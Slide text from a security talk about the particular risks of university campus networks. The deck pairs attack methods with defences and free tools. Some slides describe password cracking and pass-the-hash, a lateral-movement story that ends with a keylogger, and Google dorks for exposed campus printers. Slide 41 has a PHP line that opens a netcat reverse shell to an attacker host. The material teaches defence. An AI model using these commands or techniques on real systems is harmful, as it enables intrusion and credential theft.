1. http://Irongeek.com Adrian Crenshaw

2. http://Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m just a geek with time on my hands  Sr. Information Security Engineer at a Fortune 1000  Co-Founder of Derbycon http://www.derbycon.com http://www.derbycon.com Twitter: @Irongeek_ADC

3. http://Irongeek.com  This is a broad subject, too broad  Give you something to think about  Going to try to suggest cheap/free tools to solve problems  More notes here: http://www.irongeek.com/i.php?page=security/uni versity-campus-security-2013 http://www.irongeek.com/i.php?page=security/uni versity-campus-security-2013

4. http://Irongeek.com  What are the differences?  Open by design  Lack of physical control  BYOD (Bring Your Own Device) is standard  Early Adoption/Legacy  Apps with little regard to security  Politics/Organizational Problems  Legal Stuff

5. http://Irongeek.com  Bandwidth  Botnets  Pivots  Free Hosting  Free resources  Books/Articles  Aaron Swartz & JSTOR is a sad case of admins going too far  Research Information  Grades/Tests/Notes  Forced directory browsing for the win!

6. http://Irongeek.com  The point is to learn (in theory)  Learning is the product, not widgets or whatever  Experimentation is needed to learn  Can I run a service on this?  Where can I put my website?  Where can I run my code?  Try telling tenured faculty they can’t run a server?

7. http://Irongeek.com  Old software never dies “But I just got to use this BASICA app”  Time tables for testing  Assumption of Admin access Mitigation:  Figure out needed registry and file system permissions  Procmon http://technet.microsoft.com/en- us/sysinternals/bb896645.aspx http://technet.microsoft.com/en- us/sysinternals/bb896645.aspx

8. http://Irongeek.com  Frequent nuke and rebuilds  SteadyState – no longer supported  Achieving the effect with built in tech http://technet.microsoft.com/en- us/library/gg176676%28WS.10%29.aspx http://technet.microsoft.com/en- us/library/gg176676%28WS.10%29.aspx Commercial  Deep Freeze http://www.faronics.com http://www.faronics.com  Alternatives http://alternativeto.net/software/deep-freeze/ http://alternativeto.net/software/deep-freeze/

9. http://Irongeek.com  Besides crappy apps, there is malware  Nuke it from orbit, it’s the only way to be sure  Symantec Ghost  Open Source Alternatives: http://www.osalt.com/ghost http://www.osalt.com/ghost  Train users to put their files in a know location  Windows Easy Transfer http://windows.microsoft.com/en- us/windows7/products/features/windows-easy- transfer http://windows.microsoft.com/en- us/windows7/products/features/windows-easy- transfer

10. http://Irongeek.com  Attackers are already on the soft chewy center of the “Candy Analogy”  Remember the axiom: “If a bad guy has unrestricted physical access to your computer, it's not your computer anymore.“ ~ Microsoft or Dr. David Salomon

11. http://Irongeek.com  Password Resets  Password Bypass  Pass the Hash  Password Cracking

12. http://Irongeek.com  Offline NT Password & Registry Editor, Bootdisk/CD http://pogostick.net/~pnh/ntpasswd/ http://pogostick.net/~pnh/ntpasswd/  Bart's PE Builder http://www.nu2.nu/pebuilder http://www.nu2.nu/pebuilder  Windbuilder http://reboot.pro http://reboot.pro  Sala's Password Renew http://www.sala.pri.ee http://www.sala.pri.ee  NTPWEdit http://cdslow.webhost.ru/en/ntpwedit/ http://cdslow.webhost.ru/en/ntpwedit/

13. http://Irongeek.com  Kon-Boot http://www.piotrbania.com/all/kon-boot/ http://www.piotrbania.com/all/kon-boot/  Subverts Boot Process  Blank a password in Windows on login  Reboot and authentication goes back to normal  Some locally stored passwords will not work  Nirsoft’s Password Recovery tools: http://www.nirsoft.net http://www.nirsoft.net

14. http://Irongeek.com  Portable Boot Devices (USB/CD/DVD) http://www.irongeek.com/i.php?page=videos/port able-boot-devices-usb-cd-dvd http://www.irongeek.com/i.php?page=videos/port able-boot-devices-usb-cd-dvd  Building a boot USB, DVD or CD based on Windows 7 with WinBuilder and Win7PE SE Tutorial http://www.irongeek.com/i.php?page=security/win builder-win7pe-se-tutorial http://www.irongeek.com/i.php?page=security/win builder-win7pe-se-tutorial  Dual booting Winbuilder/Win7PE SE and Backtrack 5 on a USB flash drive with XBOOT http://www.irongeek.com/i.php?page=videos/xboo t-backtrack-winbuilder-dual-boot http://www.irongeek.com/i.php?page=videos/xboo t-backtrack-winbuilder-dual-boot

15. http://Irongeek.com  Some may be thinking: "Those are just the patron access machines - my staff workstations and file servers are still safe because they are behind locked doors."  Let me share my little horror story about network privilege escalation:

16. http://Irongeek.com 1. First frat boy Bob becomes a local admin on a workstation using a boot device. 2. He then copies off the SAM and SYSTEM files for later cracking with Cain or Hashcat http://www.oxid.it/cain.html http://hashcat.net I've done tons of videos/articles over the years on password cracking, so I'll point you to some of those: http://www.oxid.it/cain.html http://hashcat.net  Cracking Windows Vista/XP/2000/NT Passwords via SAM and SYSKEY with Cain, Ophcrack, Saminside, BKhive, Samdump2 etc http://www.irongeek.com/i.php?page=security/cracking-windows-vista-xp-2000-nt- passwords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc http://www.irongeek.com/i.php?page=security/cracking-windows-vista-xp-2000-nt- passwords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc  Password Exploitation Class http://www.irongeek.com/i.php?page=videos/password-exploitation-class http://www.irongeek.com/i.php?page=videos/password-exploitation-class

17. http://Irongeek.com 3. Many folks use the same local admin passwords on all of the boxes they deploy, allowing Bob to attack other boxes from across the network using the cracked credentials. 4. Bob then installs a software key logger to gain even more credentials as faculty, staff and students login to the compromised workstation. 5. Repeat leap frogging.

18. http://Irongeek.com  Pass the Hash  Metasploit's psexec http://www.metasploit.com/ http://www.metasploit.com/  Pass the Hash Tool Kit http://corelabs.coresecurity.com/index.php?modul e=Wiki&action=view&type=tool&name=Pass-The- Hash_Toolkit http://corelabs.coresecurity.com/index.php?modul e=Wiki&action=view&type=tool&name=Pass-The- Hash_Toolkit

19. http://Irongeek.com  Cached Domain Credentials  MSCash and MSCash v2 http://openwall.info/wiki/john/MSCash http://openwall.info/wiki/john/MSCash2 http://openwall.info/wiki/john/MSCash http://openwall.info/wiki/john/MSCash2  Cain & Able http://www.oxid.it/cain.html http://www.oxid.it/cain.html  Hashcat http://hashcat.net http://hashcat.net  Browser, Mail Client, etc.  http://www.nirsoft.net http://www.nirsoft.net

20. http://Irongeek.com  Don’t store local passwords  Don’t use LMHASHs  New OS or greater that 15 character passwords  No default local admin, but custom (HASH(MAC+SK))  Locked BIOS Unified Extensible Firmware Interface (UEFI)  Control what people can boot from  Support issues for reimaging  Better lock the case too  Cheap lock = crap lock  Prohibitively expensive to do better.  More on passwords in a bit  None of it stops hardware key loggers

21. http://Irongeek.com  Even professors from Comp Sci/Infosec may not know tech details  Defining Pen-test to two Infosec professors  Defining what a USB hub was to another  Silly attitudes: "Additionally, Mr. Crenshaw's personal website, housed on university resources, is a compendium of links to know computer hacker websites, hacker toolkits, and other hacker resources.“ ~ Larry Mand  The word hacker freaks them out a bit

22. http://Irongeek.com  Sterling Riggs WDRB Facebook Post September 26: “I don't know how I feel about this--DerbyCon happening at Hyatt downtown. It's a convention for computer hackers.”  Lot’s of prejudicial comments  I pointed it out to my infosec buds on Twitter, and tons of Infosec folks showed up to defend hackerdom and the conference  Post since deleted  But Jayson E. Street ‏(@jaysonstreet) saved some  Eve Adams got in the last words I saw: "Kill em with kindness. Hack em with hugs."

23. http://Irongeek.com  Ethics, or lack there of  You get fired for what you do do, not for what you don’t. Why rock the boat?  Tenure  No, you change your IP scheme  How do you enforce rules on those that can’t be fired?  Like High school cliques, but with more grey hair and tweed

24. http://Irongeek.com  The plural of a anecdote is not evidence, but…  The Foundation for Individual Rights in Education http://thefire.org http://thefire.org  Look over the timeline for the Jerry Sandusky case  Look up the origin of the Clery Act  No, not all schools are this way (I hope)

25. http://Irongeek.com  They have always been doing it, did not have a term for Bring you own device  Flat Networks  NAC (Network Access Control)  Better be more than MAC Address (ifconfig, MadMACs)  Crapware on box need to check system AV and patch level  http://www.packetfence.org http://www.packetfence.org  http://freenac.net (Maybe dead) http://freenac.net

26. http://Irongeek.com  Remote password attacks  Noisy  Slow  Default passwords  No passwords are common on printers  Network gear  Webcams/Teleconference  DRACs

27. http://Irongeek.com  Printers  Data leaks/Docs  DoS  Free print jobs  Stored passwords  DRACs (or other management)  Remote control  Webcams/Teleconferencing  Passwords on desks?  SoHo NASes

28. http://Irongeek.com  Softperfect’s NetScan http://www.softperfect.com/products/networksca nner/ http://www.softperfect.com/products/networksca nner/  RAWR (Rapid Assessment of Web Resources) from Adam Byers & Tom Moore (@RapidWebEnum) http://sourceforge.net/projects/rawr-webenum/ http://sourceforge.net/projects/rawr-webenum/

29. http://Irongeek.com

31.  http://www.exploit-db.com/google-dorks/ http://www.exploit-db.com/google-dorks/  Examples: Ricoh Savins intitle:"web image monitor" site:edu "/web/user/en/websys/webArch/mainFrame.cgi" site:edu inurl:"/en/sts_index.cgi" site:edu HP Jetdirects (Varies greatly from model to model) inurl:hp/device/this.LCDispatcher site:edu CUPS Connected Printers inurl:":631/printers" -php -demo site:edu intitle:"web image monitor" site:edu"/web/user/en/websys/webArch/mainFrame.cgi" site:eduinurl:"/en/sts_index.cgi" site:eduinurl:hp/device/this.LCDispatcher site:eduinurl:":631/printers" -php -demo site:edu

32. http://Irongeek.com  Some scanners will just tell you  THC-Hydra http://www.thc.org/thc-hydra/ http://www.thc.org/thc-hydra/  Medusa http://www.foofus.net/~jmk/medusa/medusa.ht http://www.foofus.net/~jmk/medusa/medusa.ht  Brutus http://www.hoobie.net/brutus/ http://www.hoobie.net/brutus/  Default Password Lists (or just Google) http://www.phenoelit.org/dpl/dpl.html http://www.cirt.net/passwords http://www.phenoelit.org/dpl/dpl.html http://www.cirt.net/passwords

33. http://Irongeek.com  Default password of a new account?  Passwords reused to often, known by too many, never changed  Frequent resets cause people to write it down (or more support calls)  Password Patterns  Passwords over Passphrase 27 40 = 1.7970103e+57 96 10 = 5.9873694e+19

34. http://Irongeek.com https://xkcd.com/936/

35. http://Irongeek.com  Facebook started on university campuses  Students are way too free with information  OSInt, Cyberstalking, Footprinting and Recon: Getting to know you http://www.irongeek.com/i.php?page=videos/osint -cyberstalking-footprinting-recon http://www.irongeek.com/i.php?page=videos/osint -cyberstalking-footprinting-recon  Curious George Bronk

36. http://Irongeek.com  How many organizations of about 7000 people have a class B?  Got in early, got a lot of space  Don’t have to NAT for numbering reasons, so a lot of stuff is on the public Internet  Some problems:  Open ports or everything!  Reconfigure devices  Reverse DNS

37. http://Irongeek.com nmap -sL 123.123.*/* Nmap scan report for pm-cser-loanbox.papermill.edu (123.123.104.120) Nmap scan report for pm-sscs-hh10500.papermill.edu (123.123.104.121) Nmap scan report for pm-buse-jsmith02.papermill.edu Nmap scan report for npi10adab.papermill.edu (123.123.118.67)

38. http://Irongeek.com  Firewall it off  Turn it off  Watch for defaults when sharing files  Things get shared with too many folkS  NetScan is awesome for finding these  Do they really need it?  Walled Off Experimentation Labs  Virtual Machines

39. http://Irongeek.com  User training  Who’s an admin?  SOHO NAS, and why are they there?

40. http://Irongeek.com  Anyone doing it?  Open Source Helpers  Graylog2 http://graylog2.org http://graylog2.org  OSSIM http://sourceforge.net/projects/os-sim http://sourceforge.net/projects/os-sim  Security Onion http://securityonion.blogspot.com http://securityonion.blogspot.com

41. http://Irongeek.com  Does the page allow for scripting?  Packages kept up to date  Old web apps never die  PHP Example $x = shell_exec("nc AttackingBoxIP 30 -e cmd ");  Web Shells http://www.irongeek.com/i.php?page=videos/oisf2013/webshells-history- techniques-obfuscation-and-automated-collection-adrian-crenshaw http://www.irongeek.com/i.php?page=videos/oisf2013/webshells-history- techniques-obfuscation-and-automated-collection-adrian-crenshaw  OWASP (Open Web Application Security Project) https://www.owasp.org https://www.owasp.org  Web Application Pen-testing Tutorials With Mutillidae http://www.irongeek.com/i.php?page=videos/web-application-pen-testing- tutorials-with-mutillidae http://www.irongeek.com/i.php?page=videos/web-application-pen-testing- tutorials-with-mutillidae

42. http://Irongeek.com  Corporate Network can get away with more because of physical perimeter (sort of)  Insecure protocols  HTTP  FTP  SMTP  Telnet

43. http://Irongeek.com  Password sniffing  Files/Print Jobs  Cookie/session hijacking  Common sniffing tools  Wireshark http://www.wireshark.org http://www.wireshark.org  NetworkMiner http://www.netresec.com/ http://www.netresec.com/  Cain http://www.oxid.it/cain.html http://www.oxid.it/cain.html  Ettercap http://ettercap.github.io/ettercap/ http://ettercap.github.io/ettercap/

44. http://Irongeek.com  Protocol replacements  IDS/IPS/ARPWatch  LAN segmentation  Network Sniffers Class for the Kentuckiana ISSA 2011 http://www.irongeek.com/i.php?page=videos/network- sniffers-class http://www.irongeek.com/i.php?page=videos/network- sniffers-class  Static ARP  ARPFreeze http://www.irongeek.com/i.php?page=security/arpfreeze- static-arp-poisoning http://www.irongeek.com/i.php?page=security/arpfreeze- static-arp-poisoning

45. http://Irongeek.com  Do you know what is out there?  Professors, students and staff could be hooking anything up  NAC may give some info  Nmap http://nmap.org http://nmap.org  Nagios http://www.nagios.org http://www.nagios.org Commercial:  Nessus http://www.tenable.com http://www.tenable.com  Nexpose http://www.rapid7.com http://www.rapid7.com

46. http://Irongeek.com  Better than it use to be  WSUS great for Windows clients you control http://technet.microsoft.com/en- us/windowsserver/bb332157.aspx http://technet.microsoft.com/en- us/windowsserver/bb332157.aspx Commercial:  Shavlik http://www.shavlik.com http://www.shavlik.com  Secunia CSI (can be uses with WSUS) http://secunia.com http://secunia.com Open Source:  http://wsuspackagepublisher.codeplex.com http://wsuspackagepublisher.codeplex.com

47. http://Irongeek.com  Open Wireless can be sniffed (duh!)  Lots of legacy system exist that may not be able to use WPA/2 Enterprise (getting better)  VPN over open WiFi was a common option  Not so useful  Disabling SSID Broadcasting  MAC Address Filtering  Evil twin attacks

48. http://Irongeek.com  Universities hit everything across the board  Most of these others in the audience will know better than I  PCI DSS (Payment Card Industry Data Security Standard)  HIPAA/HITECH (Health Insurance Portability and Accountability Act / Health Information Technology for Economic and Clinical Health Act)  FISMA/FIPS (Federal Information Security Management Act of 2002 / Federal Information Processing Standards)  IRB (Institutional Review Board)  FERPA (Family Educational Rights and Privacy Act)  Let’s dive into this

49. http://Irongeek.com Turn off the video now

50. http://Irongeek.com  Three main parts 1. Give students access to their records 2. The ability to amend records 3. To control disclosure of student records  Only for Schools getting money form U.S. Department of Education programs  Why it is pretty fucking useless!

51. http://Irongeek.com  No individual right to sue  See Gonzaga University v. Doe  Can’t find a case of any university ever loosing funding because of a breach  Have there been no breaches?  Just not enforced?

52. http://Irongeek.com Two Quotes:  "If, as a result of the hearing, the school still decides not to amend the record, the eligible student has the right to insert a statement in the record setting forth his or her views"  "Thus, while FERPA affords eligible students the right to seek to amend education records which contain inaccurate information, this right cannot be used to challenge a grade or an individual's opinion, or a substantive decision made by a school about a student."  Amendment clause has exceptions (that covers all possibilities)  Grades  Statements or Opinions  “Substantive” Decision  What is left?  Overall Conclusion: FERPA has no teeth

53. http://Irongeek.com  Mostly links, sorry  Slides will be up when I post the video, but most are in the article  If you experiences are different, I’d live to here them  Private/State/ Commercial  Teaching vs. Research  Government Research

54. http://Irongeek.com Derbycon Sept ?th-?th, 2014 http://www.derbycon.com http://www.derbycon.com Others http://www.louisvilleinfosec.com http://skydogcon.com http://hack3rcon.org http://outerz0ne.org http://phreaknic.info http://notacon.org Photo Credits to KC (devauto) Derbycon Art Credits to DigiP

55. http://Irongeek.com 42 Twitter: @Irongeek_ADC